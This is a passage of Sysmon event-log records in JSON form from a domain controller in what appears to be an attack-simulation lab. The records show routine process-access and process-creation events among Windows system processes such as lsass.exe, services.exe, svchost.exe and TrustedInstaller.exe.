vedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5349,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.190\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.190","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5350,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.190\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.190","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5351,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.190\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.190","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5352,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.190\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.190","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5353,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nProcessGuid: {41C8662E-20D2-5F25-0000-00105D520800}\r\nProcessId: 3592\r\nImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nFileVersion: 10.0.14393.3564 (rs1_release.200303-1942)\r\nDescription: Windows Modules Installer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: TrustedInstaller.exe\r\nCommandLine: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","ProcessGuid":"{41C8662E-20D2-5F25-0000-00105D520800}","Image":"C:\\Windows\\servicing\\TrustedInstaller.exe","FileVersion":"10.0.14393.3564 (rs1_release.200303-1942)","Description":"Windows Modules Installer","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"TrustedInstaller.exe","CommandLine":"C:\\Windows\\servicing\\TrustedInstaller.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5354,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.190\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 920\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-00105D520800}\r\nTargetProcessId: 3592\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.190","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"920","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-00105D520800}","TargetProcessId":"3592","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5355,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-00105D520800}\r\nTargetProcessId: 3592\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-00105D520800}","TargetProcessId":"3592","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5356,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5357,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 